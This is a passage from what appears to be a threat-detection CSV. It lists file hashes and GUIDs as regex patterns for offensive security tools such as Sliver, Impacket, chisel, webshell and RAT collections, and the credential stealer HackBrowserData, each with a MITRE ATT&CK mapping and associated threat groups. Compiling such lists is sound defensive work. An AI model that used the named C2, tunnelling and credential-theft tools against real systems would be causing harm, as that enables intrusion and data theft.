tool","https://github.com/3ndG4me/AutoBlue-MS17-010","1","0","#filehash","N/A","6","10","1240","317","2023-12-24T19:22:26Z","2017-11-25T09:03:38Z","26171" "*4bea75105d616920248cea812e818c2b103b786e050ebc27394aba87fdaca5d4*",".{0,1000}4bea75105d616920248cea812e818c2b103b786e050ebc27394aba87fdaca5d4.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","26172" "*4bf7e7b595356585599b4b2773b8a463d7b9765c97012dcd5a44eb6d547f6a1d*",".{0,1000}4bf7e7b595356585599b4b2773b8a463d7b9765c97012dcd5a44eb6d547f6a1d.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","26176" "*4bf92f0d8d8e73629d1e2b9f03375dbad214021e5a117e0557391526297c5314*",".{0,1000}4bf92f0d8d8e73629d1e2b9f03375dbad214021e5a117e0557391526297c5314.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 
- T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","26178" "*4bff519a79e681ee5bb9b4ef66794344224c2084b36cd947ac29646a5687ab64*",".{0,1000}4bff519a79e681ee5bb9b4ef66794344224c2084b36cd947ac29646a5687ab64.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","26180" "*4c0064dbf7ebbd9b8c67a355929d715cd814436d0857625a5b92468558f6393e*",".{0,1000}4c0064dbf7ebbd9b8c67a355929d715cd814436d0857625a5b92468558f6393e.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","26181" "*4c02774a5edb8a559beebcb64833177a893b49fb8eb9bfd2e650155a207c7ba7*",".{0,1000}4c02774a5edb8a559beebcb64833177a893b49fb8eb9bfd2e650155a207c7ba7.{0,1000}","offensive_tool_keyword","IPPrintC2","PoC for using MS Windows printers for persistence / command and control via Internet Printing","T1090 - T1133 - T1547.012 - T1572","TA0011 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/Diverto/IPPrintC2","1","0","#filehash","N/A","10","10","146","20","2024-05-03T11:13:38Z","2024-05-03T09:13:10Z","26182" "*4c0321729bb82e936804a1a1f8f76f6ce9906196378d0dd5441e344cda75f129*",".{0,1000}4c0321729bb82e936804a1a1f8f76f6ce9906196378d0dd5441e344cda75f129.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","26183" "*4c069fe55bd14ff52667766cd057196992b0275c78a2d8d7139b7d57c90234fa*",".{0,1000}4c069fe55bd14ff52667766cd057196992b0275c78a2d8d7139b7d57c90234fa.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux 
#windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","26184" "*4c0700a6f8d222d9b2023a800e0f286fc43e0354ec23ea21f9344adfd2fe12c8*",".{0,1000}4c0700a6f8d222d9b2023a800e0f286fc43e0354ec23ea21f9344adfd2fe12c8.{0,1000}","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1059 - T1547 - T1068 - T1562 - T1110 - T1083 - T1021 - T1071","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","0","#filehash","N/A","10","10","672","215","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z","26185" "*4c0fdf591ecec6aaeb3b6529f7b3800125910f16bc23496ba279a4bee0c2361c*",".{0,1000}4c0fdf591ecec6aaeb3b6529f7b3800125910f16bc23496ba279a4bee0c2361c.{0,1000}","offensive_tool_keyword","SharpSC",".NET assembly to interact with services. (included in powershell empire)","T1543.003","TA0003","N/A","N/A","Persistence","https://github.com/djhohnstein/SharpSC","1","0","#filehash","N/A","8","1","40","6","2019-09-27T23:04:24Z","2019-09-24T21:05:38Z","26186" "*4c146c6027d7714c632de29b05610a352ece4a5a9bae1d629d199ce9cf977d73*",".{0,1000}4c146c6027d7714c632de29b05610a352ece4a5a9bae1d629d199ce9cf977d73.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","26188" "*4c1a18d13cca40ce96d226c7f24c234a236826e4763bf62ba2b18e64b4d608f7*",".{0,1000}4c1a18d13cca40ce96d226c7f24c234a236826e4763bf62ba2b18e64b4d608f7.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege 
Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","26190" "*4c1c75f1a66eab31836ec53726fc47591a534688e79a5818ef63c1682de88cd5*",".{0,1000}4c1c75f1a66eab31836ec53726fc47591a534688e79a5818ef63c1682de88cd5.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","26191" "*4c205dad7c4b9f5f35fc8f127bc216e691f6f323e7b976512cecdce4f97a1bee*",".{0,1000}4c205dad7c4b9f5f35fc8f127bc216e691f6f323e7b976512cecdce4f97a1bee.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","26192" "*4c22a00104b52b74247f83b5c50ca09d5e9ed2db3d7d1843fe75fc283d50ffb1*",".{0,1000}4c22a00104b52b74247f83b5c50ca09d5e9ed2db3d7d1843fe75fc283d50ffb1.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","0","#filehash","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","26193" "*4c230850f0fab974effc07d9ac7df6d11f2d49cac19d71da269d1c1d18e574e2*",".{0,1000}4c230850f0fab974effc07d9ac7df6d11f2d49cac19d71da269d1c1d18e574e2.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - 
TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","26194" "*4c244a97bd354cbbefe7cfac027dfdd157b921ee5f9b66f7dce785136e657cfd*",".{0,1000}4c244a97bd354cbbefe7cfac027dfdd157b921ee5f9b66f7dce785136e657cfd.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","26195" "*4C244D2DFBC2E2A8803D3F5522D9F4A788A3A38AF3A37D86D6374A56218D29E9*",".{0,1000}4C244D2DFBC2E2A8803D3F5522D9F4A788A3A38AF3A37D86D6374A56218D29E9.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","26196" "*4c24b427581c8989acf962bc4f42b00331b4035e2155cdf97db0298fd0a34b65*",".{0,1000}4c24b427581c8989acf962bc4f42b00331b4035e2155cdf97db0298fd0a34b65.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","26197" "*4c2a1547f0dab58a9db68d236d1a6aa817761b678c84b83f36d6dc31066d7cc3*",".{0,1000}4c2a1547f0dab58a9db68d236d1a6aa817761b678c84b83f36d6dc31066d7cc3.{0,1000}","offensive_tool_keyword","Moriarty","Moriarty is designed to enumerate missing KBs - detect various vulnerabilities and suggest potential exploits for Privilege Escalation in Windows environments.","T1068 - T1083","TA0004 - TA0007","N/A","N/A","Discovery","https://github.com/BC-SECURITY/Moriarty","1","0","#filehash","N/A","7","6","510","67","2024-08-07T15:06:31Z","2023-12-11T14:15:33Z","26199" 
"*4c33b97878d1d543f60ca27673d99dc8b420628820ce29a6ff9d658f410254a5*",".{0,1000}4c33b97878d1d543f60ca27673d99dc8b420628820ce29a6ff9d658f410254a5.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","26200" "*4c341727d28ddb31f23de1e8bd96e5ebc0b9c456570af57af793b7efe9bf95ae*",".{0,1000}4c341727d28ddb31f23de1e8bd96e5ebc0b9c456570af57af793b7efe9bf95ae.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","#filehash","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","26201" "*4c368fe58781e363b1176be2a6efcfaaa74432309d1cfc251174a5650debfbe8*",".{0,1000}4c368fe58781e363b1176be2a6efcfaaa74432309d1cfc251174a5650debfbe8.{0,1000}","offensive_tool_keyword","moonwalk","Cover your tracks during Linux Exploitation by leaving zero traces on system logs and filesystem timestamps.","T1070 - T1036.005 - T1070.004","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/mufeedvh/moonwalk","1","0","#filehash #linux","N/A","10","10","1440","129","2022-10-08T05:05:36Z","2021-12-19T11:24:00Z","26202" "*4c3a4595aa10debb79201746369cde2688d0376227a4dfbbd6c1a22ed4067501*",".{0,1000}4c3a4595aa10debb79201746369cde2688d0376227a4dfbbd6c1a22ed4067501.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","26203" "*4C3B106C-8782-4374-9459-851749072123*",".{0,1000}4C3B106C\-8782\-4374\-9459\-851749072123.{0,1000}","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - 
TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","#GUIDproject","N/A","10","2","145","30","2023-10-10T19:01:42Z","2023-10-02T20:49:22Z","26204" "*4c3d4cbeec3d722929d86c0bf19108b3eac090fc5dc8fcde2cf818ff16e6fc5b*",".{0,1000}4c3d4cbeec3d722929d86c0bf19108b3eac090fc5dc8fcde2cf818ff16e6fc5b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","26205" "*4c3e3beb897dcb9a41bf4a4a051267b880b4b0f2a8691816775c2ff18d1c5bc5*",".{0,1000}4c3e3beb897dcb9a41bf4a4a051267b880b4b0f2a8691816775c2ff18d1c5bc5.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","26207" "*4c4377d6edeb56ea60d2654fec0afc21001cd93ceedaa483f53f66bb61b7904c*",".{0,1000}4c4377d6edeb56ea60d2654fec0afc21001cd93ceedaa483f53f66bb61b7904c.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - 
T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","26209" "*4c4497c8203934c12bd09ac33096b11ced541744f6b4121c2967e4cfea6e250b*",".{0,1000}4c4497c8203934c12bd09ac33096b11ced541744f6b4121c2967e4cfea6e250b.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","26210" "*4C496D14-FA2B-428C-BB15-20B25BAB9B73*",".{0,1000}4C496D14\-FA2B\-428C\-BB15\-20B25BAB9B73.{0,1000}","offensive_tool_keyword","PrivFu","manage user right without secpol.msc","T1059 - T1078","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#GUIDproject","UserRightsUtil","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","26212" "*4c4b0e00d9620697ba7ef9ff00fd58022b9e39db23dc65348fce5d3a321000e6*",".{0,1000}4c4b0e00d9620697ba7ef9ff00fd58022b9e39db23dc65348fce5d3a321000e6.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","26216" 
"*4c54cdeb6cd364faeacd795930d6878dc04f38dd2e1fd4c7b850967085d9ab01*",".{0,1000}4c54cdeb6cd364faeacd795930d6878dc04f38dd2e1fd4c7b850967085d9ab01.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","26218" "*4C574B86-DC07-47EA-BB02-FD50AE002910*",".{0,1000}4C574B86\-DC07\-47EA\-BB02\-FD50AE002910.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#GUIDproject","N/A","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","26219" "*4c589dec2312f0a4f27d747aa77671f30699cbef80554d8fb1d85cf13642a753*",".{0,1000}4c589dec2312f0a4f27d747aa77671f30699cbef80554d8fb1d85cf13642a753.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","26220" "*4C61F4EA-D946-4AF2-924B-7A873B4D964B*",".{0,1000}4C61F4EA\-D946\-4AF2\-924B\-7A873B4D964B.{0,1000}","offensive_tool_keyword","PrivFu","Kernel Mode WinDbg extension for token privilege edit","T1055 - T1078 - T1134","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#GUIDproject","PrivEditor","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","26221" 
"*4c66ef14f4cc5abf79a799b9593298278d636d9150e53b6560351e1ecbd0f6fc*",".{0,1000}4c66ef14f4cc5abf79a799b9593298278d636d9150e53b6560351e1ecbd0f6fc.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","26222" "*4c7260ac051907d12896054145fe103f9ea06de3bb2f04f0aab953dff32028de*",".{0,1000}4c7260ac051907d12896054145fe103f9ea06de3bb2f04f0aab953dff32028de.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","26225" "*4c739d4f3575d5cb19d15fcc02f55c31d30973bc9b787050c13edb8e873d8b54*",".{0,1000}4c739d4f3575d5cb19d15fcc02f55c31d30973bc9b787050c13edb8e873d8b54.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","26226" "*4c7714ee-c58d-4ef7-98f2-b162baec0ee0*",".{0,1000}4c7714ee\-c58d\-4ef7\-98f2\-b162baec0ee0.{0,1000}","offensive_tool_keyword","SpoolFool","Exploit for CVE-2022-21999 - Windows 
Print Spooler Elevation of Privilege Vulnerability (LPE)","T1068 - T1055 - T1059.003","TA0004 - TA0005 - TA0003","","Dispossessor","Privilege Escalation","https://github.com/ly4k/SpoolFool","1","0","#GUIDproject","N/A","9","8","788","160","2022-02-09T16:54:09Z","2022-02-08T17:25:44Z","26227" "*4c7e46c84520992d28f771d25ed6a4d4ccd902530f5721ee1314d9de48edbd27*",".{0,1000}4c7e46c84520992d28f771d25ed6a4d4ccd902530f5721ee1314d9de48edbd27.{0,1000}","offensive_tool_keyword","EternalBlack","EternalRomance exploit implemented by Playbit EternalBlack often used by ransomware group like Dispossessor","T1210 - T1489 - T1105 - T1486","TA0001 - TA0002 - TA0009 - TA0040","EternalBlack","Dispossessor ","Exploitation tool","https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","26229" "*4c89adb840e2c8c3dfba56ae1eda0447046bcf0796108ffc1c2d446fa3c5a200*",".{0,1000}4c89adb840e2c8c3dfba56ae1eda0447046bcf0796108ffc1c2d446fa3c5a200.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","26230" "*4c8e4b74f3326949830cf3974abc31a71852f557ae1bb9d0f4bfc1a92eb95b01*",".{0,1000}4c8e4b74f3326949830cf3974abc31a71852f557ae1bb9d0f4bfc1a92eb95b01.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","26232" "*4c9c4d9df645d45510841d2edd07bd156bbb7ecd268626895f9b4d5ac8483633*",".{0,1000}4c9c4d9df645d45510841d2edd07bd156bbb7ecd268626895f9b4d5ac8483633.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","26237" "*4c9e1588af0f951fbb311cd29bac8ce03c7d00175d5ef6747bab9ef127abc0c4*",".{0,1000}4c9e1588af0f951fbb311cd29bac8ce03c7d00175d5ef6747bab9ef127abc0c4.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","26238" "*4c9f7dd3c55b538d9c566ca20f097002c54c2b4419066e412ea27cf39fc6a83a*",".{0,1000}4c9f7dd3c55b538d9c566ca20f097002c54c2b4419066e412ea27cf39fc6a83a.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - 